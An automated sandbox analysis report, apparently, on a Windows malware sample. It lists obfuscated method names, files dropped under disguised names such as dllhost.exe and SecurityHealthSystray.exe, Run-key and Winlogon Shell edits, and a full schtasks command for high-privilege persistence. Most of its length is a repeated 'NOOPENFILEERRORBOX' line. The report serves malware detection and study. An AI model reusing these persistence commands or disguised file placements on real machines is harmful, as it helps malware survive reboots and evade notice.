                          Source: UuIspZT5b6.exe, LECsMROmVnHQhr2ootU.csHigh entropy of concatenated method names: 'Y1nO5BEjkG', 'MTjOtwfwIK', 'd3RhueIvo50WwHtkMZXc', 'y587qjIvflqnFUyd4Dmx', 'iEppPsIvJeUsjx7crk6m', 'pxgOAkCbGm', 'fpKOlMnIp5', 'e4IODSaEnM', 'ooHOPpaq3i', 'x4tOgMExx3'
                          Source: UuIspZT5b6.exe, LIBHZ3pTD8nLgmlwZ4S.csHigh entropy of concatenated method names: 'OaapDTCvVG', 'kASpPclGqU', 'S1SpgGg1dV', 'LCswNBI4a0jgrZkgWnLU', 'Y4yVEvI4CVS0IX4IG2NJ', 'ogmE0WI4xH4qxQ7w90QD', 'snmTJAI4GIPKxlvLNoD6', 'AZ9p4AbYMJ', 'Xulpm7edHW', 'R7Sp9LYoQH'
                          Source: UuIspZT5b6.exe, yk3LFASYMvbVt9EZPCu.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'AjPEjWIbgRNT4qluJrgJ', 'TPwM6rIbKiM9dIo3b9as', 'V87AZtIbnBKp0LU0yxeC', 'GQVe4kIbMRFPlRpsa2nq'
                          Source: UuIspZT5b6.exe, qFk3mmpUNeyyK3GlMLD.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'Wj0I10Tx7tN', 'UycI2DLT6BT', 'kEiRZrI4bjR9gqIBnxeJ', 'Kjake7I4q8cyYb7nO2ZZ', 'RCNYIeI4VQ4kjjNQMb7n', 'bbmGUtI4TYZUqUwt8bKu', 'lDhsHKI4BgGrCpBC1119'
                          Source: UuIspZT5b6.exe, XUSGPMS3xPjFu9equV4.csHigh entropy of concatenated method names: 'aQfS21PHH7', 'rHmScjXa7K', 'KgjSwZsXcJ', 'ul2SO0tYN4', 'sSKS1gR4RK', 'yDPSSXsBl8', 'YWiSrSJL7d', 'WJ1Sk9qrrY', 'RsOS6Kktmc', 'Xe1S0er6Bk'
                          Source: UuIspZT5b6.exe, sCFHaT50RcoMjdECtZ6.csHigh entropy of concatenated method names: 'Sw25XLOjlv', 's725pae6P0', 'uJd5LfjANr', 'rb65e2UHn3', 'E2H5C4Qw1G', 'MeY5xqkKOA', 'wZd5aXOjJE', 'Nsj5GmNgHk', 'Dispose', 'nXPSOjIWBaCdT0TLFggN'
                          Source: UuIspZT5b6.exe, zoops3wxHG8hI2ptScr.csHigh entropy of concatenated method names: 'ulqwZYy6V8', 'kG0IGQI7gpnia2CuXZmA', 'kQTd3PI7DiPf7YO8UQxX', 'ORs7WdI7PrbCrZIETITi', 'qLHavVI7KCbVF7fhpwhs', 'a75AGaI7n2i34MspLhVb', 'E94', 'P9X', 'vmethod_0', 'V0mI2dKiKv4'
                          Source: UuIspZT5b6.exe, UrleZCaCBWfXfuv64wU.csHigh entropy of concatenated method names: 'xb5aanu7RF', 'ip1aG1pM5O', 'sxPaQwUOQI', 'YMAajdlfuy', 'lNhaFhHZR2', 'x7uq1QIDSAN9jsBYQ9eY', 'ATDF16IDOKf8mZeHH5CZ', 'iL6mctID1i3TSlauYAgN', 'D2Lg1JIDryt2RKHTcGDr', 'jgKjgnIDkXk0Y7DgvAMw'
                          Source: UuIspZT5b6.exe, W57imU3Z1anf7FNs7j7.csHigh entropy of concatenated method names: 'WYx3mcSsU4', 'G8B39RZ9Dw', 'bd3KOHIj4PbiKFq1NJnd', 'dSS4gKIjmeMYX0qZ119N', 'SK73PtiVkc', 'LXmsNgIjDi1KMAtFWSgx', 'KcbFCoIjPOjIT8s59JR5', 'KyJvVdIjALPbyZr24jIE', 'F0nXNIIjlIpRQMMKCpis', 'al03uE9v9P'
                          Source: UuIspZT5b6.exe, lwg5l2OpoK2p9B0am4A.csHigh entropy of concatenated method names: 'Tj6OjdxhuS', 'Hj25BmIu5wDwrv0qc7C5', 'Vj5niVIuULdof4vRajIC', 'sogbmaIuiKvVgen6pQ7a', 'OrgwiRIutQKO6ZZHCQRA', 'GNDZ4FIuWIeQJuQ6AUYh', 'GvPkK6IuhskHZVlah6uP', 'vQ1OHS4coh', 'Fl6OLCL8oR', 'vMNOenoFTC'

                          Persistence and Installation Behavior

                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe File written: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe
                          Source: unknown Executable created and started: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe File created: C:\Users\user\Desktop\gSKbOmrW.log
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Windows\System32\SecurityHealthSystray.exe
                          Source: C:\Recovery\dllhost.exe File created: C:\Users\user\Desktop\CkfpANUC.log
                          Source: C:\Recovery\dllhost.exe File created: C:\Users\user\Desktop\tznhlkeP.log
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe File created: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe File created: C:\Recovery\dllhost.exe
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe File created: C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe File created: C:\Users\user\Desktop\UZVKerGo.log
                          Source: C:\Recovery\dllhost.exe File created: C:\Users\user\Desktop\MQZNFpoe.log
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe File created: C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe File created: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe File created: C:\Users\user\Desktop\WkrLeKmp.log
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe File created: C:\Users\user\Desktop\yfmgiIMl.log
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe File created: C:\Users\user\Desktop\pfMyjKNB.log
                          Source: C:\Recovery\dllhost.exe File created: C:\Users\user\Desktop\CcvWVetw.log
                          Source: C:\Recovery\dllhost.exe File created: C:\Users\user\Desktop\lVerBrOi.log

                          Boot Survival

                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TyCvtMoTOGrwUAEyotiaCQmKvM
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UuIspZT5b6
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TyCvtMoTOGrwUAEyotiaCQmKvM
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TyCvtMoTOGrwUAEyotiaCQmKvMT" /sc MINUTE /mo 10 /tr "'C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'" /rl HIGHEST /f
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run IdleJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run IdleJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run IdleJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UuIspZT5b6Jump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UuIspZT5b6Jump to behavior

                          Hooking and other Techniques for Hiding and Protection

                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe, Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, Process information set: NOOPENFILEERRORBOX
                          Source: C:\Recovery\dllhost.exe, Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
